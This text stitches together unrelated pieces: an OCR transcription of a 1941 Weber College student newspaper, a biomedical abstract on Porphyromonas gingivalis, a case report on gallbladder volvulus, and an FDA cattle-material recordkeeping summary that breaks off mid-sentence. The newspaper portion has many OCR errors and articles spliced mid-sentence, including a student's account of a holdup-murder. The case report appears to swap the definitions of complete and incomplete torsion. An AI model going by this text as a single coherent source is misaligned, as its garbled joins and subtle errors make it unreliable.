Group "A" will be judged by trained individuals, while group "B" will be judged by the students who participate in the debating in the "B" division. The question that will be debated upon is resolved: That the powers of the federal government should be expanded. Ten minutes will be allowed for the constructive speeches and five minutes for rebuttal speeches. Four rounds of debate will be conducted before any eliminations are made. Two defeats are necessary for eliminationg. Speakers Subjects for extemporaneous speaking will be taken from selected topics of the January and February issues of Time and News Week. The speeches will be limited to seven minutes, but they must not be less than five minutes. Any school may have as many entries in this division as it desires. Contestants in the oratorical di-(Continued on Page 1) Want to Charm? Coed Tells INew Techniques BY ABLENE ANDREW Have you heard about whodoyou-callhim and whatchamaycallher? Well, I was told by someone who found out from somebody who was told by a fellow in whosit's eight o'clock class that they were And so it goes. Do you use this expert method of making enemies and losing influence? Do you gossip? Hmm, as a gal with a P. S. degree (Professor of Sichcology,) I would diagnose your case as one of repressed desires, too much leisure time, and maybe even a little jealousy. (Mmmmm, me too.) Why don't you learn how to doodle or play the Jews harp or wooooooo Pumpkins Corners' style in 21 easy lessons? If you are the gossiping kind, it would give you another way to gain attention; and, when you open your mouth, people within a five-mile radius won't tremble and shiver in fear of what will come out. And if you aren't the gossiping kind, well, playing the Jews harp is lots of fun . . . There are some things like gossiping that decrease that certain thing called charm, appeal, good manners, personality whatever name you know it by. We all know about them, but sometimes we forget.F'rinsta-nce For instance, there is unfounded criticism, which is a first cousin Sophie to gossip. If someone is giving a lecture on "The Art of Catching Guppics," who are you to say that he's feeding you a line? After all, you're no guppy! Do you help yourself to things that don't belong to you? Perhaps unconsciously, perhaps not? Didn't you realize that they put people in jail for oh, oh. Where did this pencil I'm writing with come from? I've never seen it before. Hmm, it says U. S- government, dept. of justice . . . oh, oh. Woops, now I've got you. Do you laugh at the mistakes of others? That's an unpardonable action. Oh, you didn't laugh? gulp! I guess I'll have to try again. Who is this guy Jack Benny, anyhow? Another little thing that sorta makes guys 'n gals not so very super-special is telling shady jokes. Uh hunh, that's the kind I mean. (Continued on Page 4; Committee Tells Of Changes In Award System Amendments made to the award system, as given by Mr. Buss, chairman of award committee, and passed by the board of control. They are as follows: 1. That presidents of social clubs be given the same number of award points as those professional clubs, namely: 0-1 points per year. In case the officers change more frequently than once per year, 0-1 points will be given if the participation has been at least two quarters. 2. That the president of the inter-club council be awarded from 0-1 points per year. The club sponsor shall recommend the candidates to the awards committee. 3. That members of the Letter-men's club be allowed to purchase purple sweaters with a white block "W" at the close of the activity in which an award is earned. The director of the activity will recommend the candidates and after approval by the awards and scholarships committee the faculty sponsor of the Lettermen will supervise the choice of style arid purchase of the sweaters. The members of the club shall consist of those students who have earned two or more award points in athletics and have been passed on according to the rules of the award system. Ie defining close of activity, it is to be understood that the candidate shall have attended two quarters or at least one and be registered for the second in the year in which the two points in question were earned. 4. That the participant for an award shall be limited to two simultaneous activities and 11 activity points per year. The com bined awards committee and the board of control shall have the power to modify the above in exceptional cases. 5. That a person shall not be eligible for Orion on scholastics alone. Student chairman for this committee is Arlene Jensen. Kent Baggs, Earl Tanner, Loyal Chris-tenson, Carolyn Smith make up the rest of the group. Music Festival Plans Made Plans for housing and entertaining an expected 5000 junior and senior high school music students who will come to Ogden May 8, 9, and 10 for the regional music festival, have been formulated by committees appointed by Clair W. Johnson of Weber music department and general chairman of the festival. Earl W. Folkman has been named chairman of the housing committee, Mr. Johnson reported, and will immediately choose other members of his committee in order to prepare to take care of every student and faculty member who attends the festival. Present plans include a canvass of every home in Ogden to find plays for these music students in private homes during the three-day contest. Facilities of Weber college and Ogden senior high school will be made available for most of the contests, with a big downtown parade of bands and other participants scheduled for Saturday, May 10, the final day of the festival. Immediately following the parade, the bands will move to Ogderi municipal stadium, where each of the contestants placing first, second or third in each event, will be given certificates of award for their participation. The big event, however, will be the massed formations and band numbers at the stadium, which, it is believed, will draw a numerous group of spectators to see the grand finale of the three-day festival. The anticipated students who will come to Weber in May will come from Wyoming, Colorado, Utah, Idaho, and Nevada, and only those students who have placed in district festivals with a rating "superlative" will be heard in the festival contests in Ogden. Other committee heads named by Mr. Johnson include A. L. Levin, finance; Police Lieutenant Darrei E. Shaw, traffic; William P. Miller, superintendent of Weber county schools, entertainment; with Louis A. Gladwell as chairman and M. J. Bunnell and T. R. Johnson as members of the publicity committee. Winter Scribulus Publication Set Winter publication of the school magazine, "Scribulus," will be out in about two weeks, reports Mr. Reed Coray, editor. The issue will be of interest to every student at Weber. Scribulus will feature each department with demonstrations and exhibits. This feature will present exhibits of the business correspondent students. Some of the outstanding features in the publication this quarter will be a poem, "Illiandia," by Dan Bailey, and "Drum to No Pacing," by Wayne Bundy. The COVer will he dnne Kv fr Farrell Collett. Charmers Complete Domesticity has invaded the student body office as A. W. S. officers act as student body officers for Charm week. Above, Max Orton receives his "draft notice" for the Conscription ball from President Rosella Larkin, while Secretary Marian Fiet and Vive President Louise Dixon "charmify" their surroundings with a broom and watering can, respectively. Women Take Over' Offices, Set Lectures, Assemblies, and Ball for Charm Week Fashion reviews, talks on charm, special assemblies, dramatic produc tions, radio broadcasts, and a big conscription ball all are included in the activities of Charm week. Charm week, which is an annual affair, is to be sponsored next week here at Weber by the Associated Women students. The A. W. S. officers with the organization's advisor, Mrs. Clarisse Hall, are in charge of activities. Weber for the first time will be governed by women. Student President Mark Austad will abdicate to Rosella Larkin; as likewise Emma Martin, to Louise Dixon, and Ethel Hogge, to Marian Fiet during Charm week. In a special girls' assembly Tuesday a play entitled "All This and Allen Too," Is to be presented by Virginia Allen and Dorothy Lichfield. This play Is written by Joan Allred, and it is the story of a group of college girls preparing for a dance. Characters The characters are portrayed by Beverly Jurgens, Neta Chard, Lucille Burbidge, Mary Lou Foutz, and Helen Thorpe. Wednesday in the women's lounge at three, Mrs. Beth Summerhays of Z. C. M. I. will give a lecture and fashion show. Thursday at seven-thirty Dean Myrtle Austin of the University of Utah will lecture to the girls. The week will be climaxed Friday by a big conscription ball which is to be held in the college ballroom.Chairman General chairman of the dance is Marian Fiet with the following committees acting under her: Signpost publicity, Ardell Russell and Marjorie Vowles; advertising, Elizabeth Blair, Ruth Carver, and Ber-nice Perrin; invitations, LaRene Thompson; decorations, Mildred Taggart; tickets, Clare Gilman, and programs, Helen Fuller. Chairman of the assembly is Louise Dixon, and the lectures are under the direction of Dorothy Meyer, Winona Webester, and ElsieMcKay. Weber Freshman Plays Role BY GERALD WRIGHT Darrell Brown, freshman business student at Weber college, today described a most harrowing experience to student acquaintances, as the result of a hold-up-murder in which he participated as one of the victims. A part-time employe of Safeway Grocery Store No. 4 of Ogden, Brown was working at his job of cashier Tuesday evening at the time of the holdup, which resulted in the death of Detective Hoyt Gates. The whole ghastly affair, Brown indicated, showed that the bandit was an experienced, merciless criminal and not the weeping novice published reports have characterized him as. Brown's own account follows: Closing Time "It was six-thirty, closing time. The employes of the store were cleaning up, preparing to leave. As it was my duty to lock the door, I had taken the keys from the manager and walked toward the front of the store. Before I could reach the door it opened, admitting a six-foot man of medium build wearing a dark overcoat. His right hand was held up inside the coat in a curious fashion. Otherwise he was just a late customer. "Instead of passing, he bumped into me and something was jammed in my ribs hard. Go back to the till,' he said and poked me with his gun. Call the other fellows. I called but they thought I was just joking. 'Get them over here Charm Plans... personality and marjorie Lecturer . . Mrs. Beth Summerhays Charm Lectures Feature S. L. Women Mrs. Beth Summerhays, fashion co-ordinator and fashion show director of Z. C. M. I., will he at Weber Wednesday afternoon. Mrs. Summerhays will bring with her two models who will demonstrate college fashions. She graduated from the University of Utah with a major in home (Continued on Page 2) or I'll let you have it,' he swore at me. Goddamming and sonsa bitching me. I yelled again and swore too but was almost paralyzed. Whew! "The manager was talking on the telephone to a woman. He was so he could say, 'Call the police' to her but nothing more. He didn't know himself what was up but one of the clerks told him to say it. Then he hung up. Late Customer "We were all gathered by the check stand. The fellow said, 'Okay, now give me the money.' Just as I reached for the register, in walked a late customer and his wife. The bandit scattered us but the customer said, 'What's come over you guys, takin' it easy for a change?' Then he and the hold-up both went to filling baskets, but the gunman kept us covered inside his coat. "When Detective Gates stepped inside, 10 minutes after the call, somehow the fellow spotted him for a policeman and let him have it. Three times in all, at about 20 feet. He hit Gates every time but Gates' bullets went into the ceiling. After the detective crawled outside, the fellow tried for a getaway but Gates shot again. Somehow the fellow thought the place was surrounded and only tried to get the manager to come to him for a shield. But the manager got shot at a few times by the bandit and kept away. By this time all the clerks and the customer's wife were hid out in the meat department. K3ra3K&.. vowles All week long the fellows of Weber college have been anxiously watching lists on the bulletin board to see if they can possibly go to the registrar's office. Why? To get their grades? To see if they are still students in good standing? No! To see if by any chance they have been drafted for Friday night, February 21. The girls at Weber have chosen to show their patriotism by giving a conscription dance, using a patriotic theme, and drafting their partners.Each girl placed her preference in a gold fish bowl. The fellow who received the most invitations will be presented at intermission and crowned king. (Maybe in this case he ought to be the general.) The invitations are being given out this week by Mrs. Clarisse Hall, advisor of A. W. S., who is also the registrar. Tickets will be on sale next Monday in the women's lounge for 50 cents. The music for the dance is to be furnished by the Hi-Hatters. At intermission a floor show will be presented under the direction of Lorraine Ritchie. The ballroom will be decorated in red, white, and blue. "If you fellows haven't yet received an invitation, have hope because some of the girls are slow in turning in their preferences. And girls turn in your preferences at once, before the men around Weber all go gray," says President Larkin. Injured Students Return To Classwork Here Foss Robinson and Clair Aldous are now back at school again after being absent for several days due to injuries sustained in an automobile crash. While driving home from Salt Lake City during a snow storm an approaching car skidded into the right hand lane in which Clair Aldous was driving. Due to the wet and slippery highway, neither car was able to stop and the cars collided. In Holdup-Murder DARK EL BROWN The customer was hid out in the back of the store, but the people in the street could see him and tried to get the police to do something about him; they thought he was the robber. Tear Gas "By this time the police had edged into the store and were trying to get at the fellow. He was at the rear of the store watching the door to the back room and the front entrance both, but the State Legislative Group Slates Biennial Junket to Weber College Weber College Roll Shows Heavy Increase Weber college, with an enrollment of 1224 resident full-time students for the 1940-41 academic year, contributed to a 20 per cent increase in the enrollment of 610 American junior colleges during the past year, figures released Friday in the 1941 directory of American Association of Junior Colleges reveal. Utah's six junior colleges have a total enrollment of 3299. This figure is exceeded in the 11 western states only by California, which has 64 junior colleges and 86,357 students. Idaho is third in the western group with four junior colleges and 2110 students, the directory shows. Statistics issued last fall by Dr. Walter C. Eells, executive secretary of American Association of Junior Colleges during an Ogden visit, show that California, Utah, and Idaho also lead the nation in per capita junior college enrollment. California has 119 junior college students per 10,000 population; Utah, 39; and Idaho, 38. The national average is 15, Dr. Eells pointed out. Weber college's enrollment jumped from 875 at the close of the 1938-39 year to 1121 at the close of 1939-40. Thus far in 1940-41, with the school year only half completed, the figure has reached 1224, college officials said. Substitute Lyceum Comes Feb. 24 Dr. A. M. Harding of the University of Arkansas will present a Sky Tour here on Monday, February 24 at eleven o'clock in the Moench auditorium. Dr. Harding is replacing Max Gene Noal, deep sea diver. Dr. Harding, professor of mathematics and astronomy, has devoted more than 30 years to the study of science, part of which time was spent at the University of Chicago, where he was awarded a doctor's degree in mathematics and astronomy.Although he has written several scientific textbooks his illustrated address are simple, non-technical, full of life and detail. They are intended for those who have not made a special study of science. Dr. Harding will present his program at the University of Utah the same day as he will be here. He will journey to the U. S. A. C. after he is here. Four Weberites Receive Cadet Appointments As a result of difficult physical and mental examinations, three Weber college students, and one alumnus received their letters of acceptance to the U. S. flying cadet service recently. The recipients are: Blaine Felt, Alan Christenson, Wendall Sepich, and Sam Anderson.They will be called to service just as soon as classes can be arranged to accomodate them. They will probably receive the appointments within the next few weeks. police got in and kept crawling toward him. Finally a tear gas bomb thrown into the back room bothered him and the police put their guns on him and he threw his gun away and put up his hands. "But he wasn't the sissy the reports made him out to be. If he seemed to be shedding tears, it was just the gas. He was a real gang-buster bad man in our store for about 35 minutes. And we knew we were in danger of getting shot all the time he was there, though we didn't know Detective Gates had been hit." Brown still showed signs of the ordeal when he gave out these facts of his experience, some hours later. He said bullet holes showed that 17 shots had been fired. Faculty Seminar Panel Discusses Maw Bill Governor Herbert Maw's streamlined bill for governmental reorganization of Utah was discussed in panel by faculty members in their regular seminar Monday evening in the ladies' lounge. The seminar committee of the faculty had general charge. Mr. David Trevithick led the discussion and Mr. Walter Neville, Mr. Clyde Decker, Mr. Dix Jones, and Mr. C. H. Anderson spoke on phases of the bill. Trend of the discussion was chiefly favorable. Utah House Members and Senate Committee Plan Visit February 26 Entries Pour in for Second Annual Journalism Contest Second o fthe annual high school newspaper contests sponsored by Weber college journalism department is well under way with fifteen hig. schools alreadj entered in the contest. The contest is under the direction of C. M. Nilsson, advisor, J. M. Demos, Signpost editor and Marva Jensen, contest editor. "With final judging scheduled for April 1 we are receiving letters from high schools almost daily," states Marva Jensen, contest editor. All the high schools in Utah to which the contest is limited, have been contacted and although some of them have mimeographed newspapers and are not eligible for the contest the rest have shown eagerness to enter it. The high schools which have entered so far are "Searchlight," Bear River high school, "The Pro-vonian" Provo ligh school, "Red and Blue" Springville high school, "Davis Darts" Davis county high school, "Tiger Highlights" Ogden high school, "The Broadcaster" Jordan high school, "The Clarion" South Cache high school, "The Bee" Box Elder high school, "South Scribe" South high school, "Logan Grizzly" Logan high school,"Murray-Go-Round" Murray high school, "The Red and Black" East high school, "The Norcachian" North Cache high school, "Red and Gray Flashes" Spanish Fork high school, and "The Granitian" Granite high school. The school which is judged best on the merits of copy, appearance, etc., is awarded a cup, and all of the high schools entered in the contest will receive constructive criticism. The cup was won last year by the "South Scribe," newspaper published by South high chool, Salt Lake City. Business Club Presents Comic Play BY DEWEY HUDSON Business definitely took a turn for the better last Friday when the members of the business club presented an assembly for the student body in the Moench auditorium during the regular assembly period. Presenting a humorous skit depicting the ridiculous situation resulting from 110 people of directly opposite personalities being stuck in an elevator between floors in a metropolitan building, the cast had the audience literally rolling in the aisles from beginning to end. "The Lost Elevator," written by Percival Wilde, and directed by Miss Coleman of the business department was the title, and the cast was as follows: Don Peterson as the almost-engaged-man, Lois Peterson as thealmost-engagcd-young wjman, Grant Neuteboom as a book salesman, Charles Daniels as the colored elevator man, Rex McEntire as the big good-natured man, Winslow Cardner as the man who was in a hurry, Betty Blair as the nice old lady, Marion Ny-land as the romantic old maid, Ruth Compton as the German lady, Helen Thorpe as the woman with a tooth ache. Darold Burt, president of the Business club, gave a short review of the program, and introduced the rest of the officers: Marion Fiet, vice president; Foss Robinson, secretary, and Lewis Austad, manager. J. C. C. Oratorical Contest Slated February 21, a patriotic assembly will be held at Weber college under the auspices of the junior chamber of commerce- The program will consist of musical numbers and two speeches on patriotic subjects. The eight-minute speeches wiH be given by Weber college students. Students who would like to participate should contact Mr. Allred. Preliminaries for the speech contestants will be held Monday or Tuesday, and two finalists from this group will be presented in the assembly. The winner of the two finalists who give their speeches in the assembly will be awarded a medal. The winning member will also be honored by having his name engraved upon a gold cup which will be kept within the school. Assembly, Campus Tour Set For Reception Utah state legislators will be guests at Weber college, February 26. All members of the house of representatives and propably a committee from the senate will be here. Many of them will be accompanied by their wives. The trip will give the legis-ture a general impression of the whole school while it is in operation, familiarize them with the needs and progress of the school. An assembly will be held that day to welcome and meet the members. President H. A. Dixon and Mr. Whitney Young will be In charge of the assembly. President Dixon yesterday said: "Every student is urged to be present because the occasion is important." Members The members of the legislature will arrive by bus from Salt Lake City at nine o'clock. They will be met by the band and committeei in charge of the day at the gymnasium building. They will then separate into tours of inspection of the various buildings- An assembly is tentatively slated at eleven o'clock. The afternoon will be spent visiting other state institutions such as the Sanitorium, the State Industrial School, and the Deaf and Blind School. In the evening they will have dinner in the cafeteria under the supervision of Mrs. Lydia Tanner. The general committee who will be in charge of the events of that day, as far as Weber college is concerned, is composed of President Dixon, Mr. John Benson, Mr. C. H. Anderson, Mrs. Clarisse Hall, and Mr. Robert Clarke of the faculty. Committees These will be in charge of subcommittees: Robert Clarke, exhibits; John Benson, publicity; David R. Trevithick, tours; Mrs. Lydia Tanner, luncheon; Orlo Childs, luncheon program; Ralph Jenson, transportation; President Dixon, invitations; President Dixon and Whitney Young, assembly, and Mrs. Clarisse Hall, reception. A number of students will be appointed to serve on committees. A girls club will usher at the assembly and take charge of the coats and hats of legislators and their wives. Yehudi Menuhin Program Listed Monday, February 17 at eight-thirty p. m- Yehudi Menuhin will present one of the biggest community concerts of the season in the Ogden high school auditorium. Mr. Guy Hurst, Weber college director of the lyceum, today urged college students to be in their seats early. Mr. Menuhin will play the following program with Hendrik Endt at the piano: 1. 'Sonato in G Minor (The "Devil's Trill,") Tartini-Kreisler. 2. Sonata No. 1 in G Minor (for violin alone.) Bach. Adagio, Fuga (Allegro,) Siciliano, Presto. INTERMISSION 3. 'Concerto No. 1 in D Major, Opus 6, Paganini. (Urtext Edition to Commemorate the Centenary of Paganini) Allegro Maestoso (Cadenza by Emile Sauret.) 4. A. Negro Spiritual Melody, Dvorak-Kreisler, (from the Largo of "The New World Symphony." B 'Caprice Basque, Sarasate. C. 'Caprice Vien-nois, Kreisler. D. 'La Fille aux cheveux de Iin, Debussy-Hartmann. (The maiden with the flaxen hair.) E. La Ronda des Iutins (The dance of the goblins,) Bazzini. Each one of the compositions on this program has been recorded by Mr. Menuhin for the Gramophone Company of England and in America, on Victor Red Seal records. For his concerts Mr. Menuhin will play two of the finest instruments in the world, the famed "Princess Khevenhueller" Stradivarius. made in 1733 and played by only four violinists since, and a 1742 Guar-anerius, the recent gift of hie wife.
[Porphyromonas gingivalis infection enhanced the adhesion of monocytes to endothelial]. To observe if Porphyromonas gingivalis (Pg) infection could enhance the adhesion of human monocytic cell line (THP-1) to human umbilical vein endothelial cells (HUVEC). PgATCC33277 was cultured in anaerobic jar, and THP-1 was infected with various concentrations of PgATCC33277 at multiplicity of infection (MOI) of 1: 100 for 8 and 24 hours, respectively. After removal of the free Pg, THP-1 cells were cocultured with HUVEC for 1 hour to observe the adhesion of THP-1 to HUVEC.HUVEC with adhesive THP-1 cells were co-cultured for additional 23 hours. The medium and cells were separately collected. The expression of related chemotactic cytokine[monocyte chemotactic protein 1(MCP-1) and interleukin 8(IL-8)] and intercellular adhesion molecule-1(ICAM-1) were detected with enzyme-linked immunosorbent assay. The adhesion of THP-1 to HUVEC was enhanced (13.8%-35.2%, P = 0.006) and the expression of ICAM-1 of HUVEC was increased from (132.5 ± 7.7) to (164.9 ± 9.1) ng/L (P = 0.005) after infection for 24 hours by Pg. Both of the secreted MCP-1 and IL-8 elevated after infection of Pg for 24 hours from (183.2 ± 3.1) to (221.0 ± 4.9) ng/L (P = 0.012) and from (587.2 ± 5.1) to (787.2 ± 10.3) ng/L (P = 0.002), respectively. Pg could enhance the adhesion of monocytes to endothelial cells and stimulate the inflammation, suggesting that Pg infection may be one of the risk factors in promoting the development of atherosclerosis.
Background ========== Gallbladder torsion with resulting volvulus is a rare entity of acute abdomen. It was first described in 1898 by Wendel in a 25-year-old pregnant woman \[[@b1-amjcaserep-20-1879]\]. Since then, over 500 cases of gallbladder torsion have been reported with an incidence of approximately 1 in 356 000 hospital admissions \[[@b2-amjcaserep-20-1879]\]. The most common presentation of gallbladder volvulus is that of acute cholecystitis, and a preoperative diagnosis of gallbladder volvulus is rarely made \[[@b3-amjcaserep-20-1879]\]. Unlike acute cholecystitis, gallbladder volvulus carries the risk of perforation \[[@b4-amjcaserep-20-1879]\], thus early diagnosis and prompt treatment of gallbladder volvulus is imperative, as it decreases mortality and morbidity from a perforated gallbladder and ensuing peritonitis \[[@b3-amjcaserep-20-1879],[@b4-amjcaserep-20-1879]\]. In this report we present a case of gallbladder volvulus that initially presented as gastroenteritis then with the findings of acute cholecystitis on imaging. Case Report =========== A 57-year-old female presented to the emergency department with severe upper abdominal pain, 2 episodes of bilious vomiting, and one episode of loose stools. The patient's only medical history is hypertension that is adequately controlled. On presentation she was hemodynamically stable and afebrile. On physical examination the patient had a soft non-distended abdomen with normal bowel sounds; epigastric pain on deep palpation was noted as well as right upper quadrant tenderness, however Murphy's sign was negative. The patient's laboratory studies including leukocyte count, hepatic enzymes, and pancreatic enzymes were all within normal range. An initial diagnosis of viral gastroenteritis was made based upon the patient's presentation with vomiting and loose stools, as such the patient was given symptomatic treatment. The patient had no relief from the pain and was given pethidine 75 mg subcutaneously, also without improvement in pain. Due to these unusual findings, the patient was admitted to the hospital for further workup. During this time the patient was still experiencing nausea and vomiting resistant to medications (metoclopramide and ondansetron). An abdominal ultrasound was performed which showed findings of acute cholecystitis with microlithiasis without signs of dilation of intra or extra-hepatic bile ducts. A diagnosis of acute cholecystitis was made, and the patient was planned for cholecystectomy less than 24 hours of admission. An open approach was agreed upon due to the unusual presentation of resistant pain, recurrent vomiting, and a new finding on physical examination of a palpable mass in the right upper quadrant. Operative findings included a black, gangrenous, and voluminous gallbladder with a large mesentery displacing the gall-bladder from the liver bed ([Figures 1](#f1-amjcaserep-20-1879){ref-type="fig"}[](#f2-amjcaserep-20-1879){ref-type="fig"}[](#f3-amjcaserep-20-1879){ref-type="fig"}--[4](#f4-amjcaserep-20-1879){ref-type="fig"}). A clockwise torsion around the gallbladder axis was noted, detorsion was done manually, and the cholecystectomy proceeded without any complications. The patient was discharged home on the third day following surgery. Discussion ========== Gallbladder volvulus is a rare condition that might carry significant mortality risk if not identified and treated early on in its course. The frequency of this disease increases with age, with some reports stating an average age between 60 and 80 years old \[[@b5-amjcaserep-20-1879],[@b6-amjcaserep-20-1879]\]. Gallbladder volvulus has a predilection among adult females with a female: male ratio of 4: 1, however, the reverse is true in the pediatric population with a female: male ratio of 1: 3 \[[@b6-amjcaserep-20-1879]\]. The literature reports a mortality rate up to 6% \[[@b6-amjcaserep-20-1879],[@b7-amjcaserep-20-1879]\] if promptly treated and 100% if left untreated \[[@b3-amjcaserep-20-1879]\]. It is hypothesized that certain congenital gallbladder anomalies might predispose to torsion. Of particular importance is the free-floating gallbladders classified by Gross \[[@b8-amjcaserep-20-1879]\] into 2 types: type A where a long and wide mesentery supports both the gallbladder and the cystic duct, and type B, where an incomplete mesentery supports only the cystic duct. Four other anatomic variants of the gallbladder have been described that might increase the risk of gallbladder volvulus \[[@b3-amjcaserep-20-1879],[@b5-amjcaserep-20-1879]\]. The first variant is a congenital anomaly where the pars cystica fails to migrate normally from the hepatic diverticulum during week 4 to week 7 of embryological development which causes a complete absence of the gallbladder mesentery. The result is a free-floating gallbladder suspended by the cystic duct and artery alone. The second abnormality is a result of normal aging where the gallbladder mesentery elongates and becomes mobile; this combined with atrophy of the liver increases the risk of gallbladder torsion. The third anomaly is described as a detached fundus of the gallbladder from the liver bed, increasing its mobility and the risk of torsion. The fourth variant is also the rarest and is a normal gallbladder fixed to a mobile hepatic lobe. Volvulus might be complete (180° torsion or less) or incomplete (more than 180°) \[[@b9-amjcaserep-20-1879]\], and it might be clockwise or anticlockwise \[[@b6-amjcaserep-20-1879]\]. Our patient had a large and elongated gallbladder mesentery which is the result of normal aging and might have contributed to the clockwise torsion of the gallbladder. Clinical presentation of gallbladder volvulus is non-specific and variable, it ranges from acute abdomen to chest pain, but most commonly present similarly to acute cholecystitis with right upper quadrant pain \[[@b5-amjcaserep-20-1879],[@b9-amjcaserep-20-1879]\]. Presentation can be correlated with the type of torsion, recurrent episodes of incomplete torsion might lead to recurrent pain \[[@b3-amjcaserep-20-1879]\], as such a careful history must be obtained from the patient. Clinical symptoms include abdominal pain, nausea and vomiting, and a palpable mass in the right quadrant \[[@b3-amjcaserep-20-1879]--[@b5-amjcaserep-20-1879],[@b7-amjcaserep-20-1879],[@b9-amjcaserep-20-1879]\]. A triple triad has been described to clinically differentiate between acute cholecystitis and gallbladder volvulus \[[@b3-amjcaserep-20-1879],[@b5-amjcaserep-20-1879],[@b7-amjcaserep-20-1879]\]; the first is patient characteristics where there is increased risk of torsion among the elderly, thin, or patients with spine deformities. The second triad is based on clinical symptoms of sudden onset pain, right upper quadrant pain, and emesis all of which favor gallbladder torsion. The third triad is of clinical signs seen on physical examination; a non-toxic appearing patient with pulse temperature discrepancy and a palpable mass in the right upper quadrant make the diagnosis of gallbladder torsion more likely. The case presented here is unusual, as the patient had signs and symptoms suggestive of gastroenteritis which is an extremely unusual presentation for gallbladder volvulus that has not been described in the literature. Preoperative diagnosis of gallbladder volvulus has increased from 10% \[[@b3-amjcaserep-20-1879]--[@b5-amjcaserep-20-1879]\] to 26% \[[@b6-amjcaserep-20-1879]\], most likely due to advancements in imaging modalities. Ultrasound is the preferred modality, as a first line of imaging \[[@b3-amjcaserep-20-1879]\], to diagnose both acute cholecystitis and gallbladder volvulus, however distinguishing between these 2 entities might not always be possible, as both might show wall thickening and surrounding edema with gallstones \[[@b3-amjcaserep-20-1879]--[@b6-amjcaserep-20-1879]\], as was the case with our patient. Another differential diagnosis that can be made based on ultrasound findings is acalculous cholecystitis since gallbladder torsion might present with no gallstones \[[@b3-amjcaserep-20-1879]--[@b6-amjcaserep-20-1879]\]. Certain signs on ultrasound have been solely described in gallbladder torsion which might assist in diagnosis \[[@b3-amjcaserep-20-1879]\], these include a free-floating gallbladder detached from the liver bed or a floating gallbladder with discontinuity of the lumen. Another finding described in gall-bladder volvulus is the presence of a continuous hypoechoic zone between 2 echogenic areas which signifies venous and lymphatic stasis \[[@b3-amjcaserep-20-1879]--[@b5-amjcaserep-20-1879]\]. Doppler ultrasound can confirm the diagnosis by the absence of blood flow in the cystic artery \[[@b3-amjcaserep-20-1879]--[@b5-amjcaserep-20-1879]\], however this method is not routinely used probably due to the low index of suspicion for gallbladder torsion. To be more precise ultrasonography and computed tomography (CT) are the primary imaging approaches used for diagnosis. But the difference a CT scan can reveal a "floating gallbladder" with gallbladder wall thickening. A magnetic resonance imaging (MRI) can help with the imaging of a twisted cystic duct, and T2 weighted images are beneficial for evaluating necrosis of the gallbladder wall. Early diagnosis of gallbladder torsion can help to prevent life-threatening complications such as gallbladder gangrene, perforations causing bilious peritonitis, and other infections. For preventing this sequela, ultrasonography and CT are the primary imaging approaches. Early use of appropriate imaging prevents complications, reduces mortality and morbidity rates, and decreases hospitalization costs \[[@b10-amjcaserep-20-1879],[@b11-amjcaserep-20-1879]\]. Treatment of gallbladder volvulus is emergency cholecystectomy, as delay in treatment might increase the risk of perforation, peritonitis, and death \[[@b3-amjcaserep-20-1879],[@b4-amjcaserep-20-1879]\]. A laparoscopic approach has been described and is the preferred method for detorsion and cholecystectomy \[[@b3-amjcaserep-20-1879]--[@b5-amjcaserep-20-1879],[@b7-amjcaserep-20-1879]\]. We opted for an open approach as the diagnosis was unclear and the patient had an unusual presentation of what was presumed to be acute cholecystitis based on ultrasound. Percutaneous drainage of the gallbladder might sometime be wrongly performed due to the initial diagnosis of acute cholecystitis in an elderly patient with contraindications to laparoscopy \[[@b5-amjcaserep-20-1879]\]. Drainage should not be performed for gallbladder volvulus as it will only address the patient's symptoms, and the torsion will continue to exist further increasing the risk of perforation and peritonitis \[[@b4-amjcaserep-20-1879],[@b5-amjcaserep-20-1879]\]. Conclusions =========== Gallbladder volvulus is an uncommon occurrence that is mainly seen among elderly women and is frequently undiagnosed preoperatively due to unspecific presentations that might mimic acute cholecystitis. Improvements in imaging modalities have assisted physicians in making the diagnosis of gallbladder volvulus; ultrasound is the modality of choice as a first line of imaging \[[@b3-amjcaserep-20-1879]\], and Doppler might be used if there is a high index of suspicion for gallbladder volvulus. Once the diagnosis of gallbladder volvulus is made, prompt treatment with laparoscopic cholecystectomy must be performed. Early detection and prompt treatment are imperative as delay in diagnosis might be fatal. **Conflict of interests** None. ![Paramedian incision on the right below the costal margin, black gangrenous voluminous gallbladder was visualized.](amjcaserep-20-1879-g001){#f1-amjcaserep-20-1879} ![A clockwise torsion around the gallbladder axis was identified.](amjcaserep-20-1879-g002){#f2-amjcaserep-20-1879} ![Cystic duct and cystic artery were identified by dissection, they were ligated and cut.](amjcaserep-20-1879-g003){#f3-amjcaserep-20-1879} ![Gallbladder was separated from its hepatic attachment and excised. The common bile duct was observed with careful attention](amjcaserep-20-1879-g004){#f4-amjcaserep-20-1879} [^1]: Authors' Contribution: [^2]: Study Design [^3]: Data Collection [^4]: Statistical Analysis [^5]: Data Interpretation [^6]: Manuscript Preparation [^7]: Literature Search [^8]: Funds Collection [^9]: **Conflict of interest:** None declared
SUMMARY: The Food and Drug Administration (FDA) is requiring that manufacturers and processors of human food and cosmetics that are manufactured from, processed with, or otherwise contain, material from cattle establish and maintain records sufficient to demonstrate that the human food or cosmetic is not manufactured from, processed with, or does not otherwise contain, prohibited cattle materials. These recordkeeping requirements provide documentation for the provisions in FDA's interim final rule entitled ``Use of Materials Derived From Cattle in Human Food and Cosmetics.'' FDA is requiring recordkeeping because manufacturers and processors of human food and cosmetics need records to ensure that their products do not contain prohibited cattle materials, and records are necessary to help FDA ensure compliance with the requirements of the interim final rule. On July 14, 2004, FDA proposed a rule entitled ``Recordkeeping Requirements for Human Food and Cosmetics Manufactured From, Processed With, or Otherwise Containing, Material From Cattle'' (the proposed rule) (69 FR 42275) to require that manufacturers and processors of human food and cosmetics that are manufactured from, processed with, or otherwise contain, material from cattle establish and maintain records sufficient to demonstrate the food or cosmetic is not manufactured from, processed with, or does not otherwise contain, prohibited cattle materials. The proposed rule was a companion rulemaking to FDA's interim final rule (IFR) entitled ``Use of Materials Derived From Cattle in Human Food and Cosmetics'' (the IFR) (69 FR 42256). We believe that records sufficient to demonstrate the absence of prohibited cattle materials in human food and cosmetics are critical for manufacturers, processors, and FDA to ensure compliance with the ban on prohibited cattle materials. Therefore, we are finalizing the proposed rule to require that manufacturers and processors of human food and cosmetics that are manufactured from, processed with, or otherwise contain, material from cattle establish and maintain records sufficient to demonstrate that human food and cosmetics are not manufactured from, processed with, or do not otherwise contain, prohibited cattle materials. We also are finalizing the provision in the proposed rule that these records must be made available to FDA for inspection and copying. FDA notes that the requirement in the IFR that existing records relevant to compliance be made available to FDA remains and has been incorporated into the final record provisions. In response to the December 2003 finding of an adult cow--imported from Canada--that tested positive for bovine spongiform encephalopathy (BSE) in the 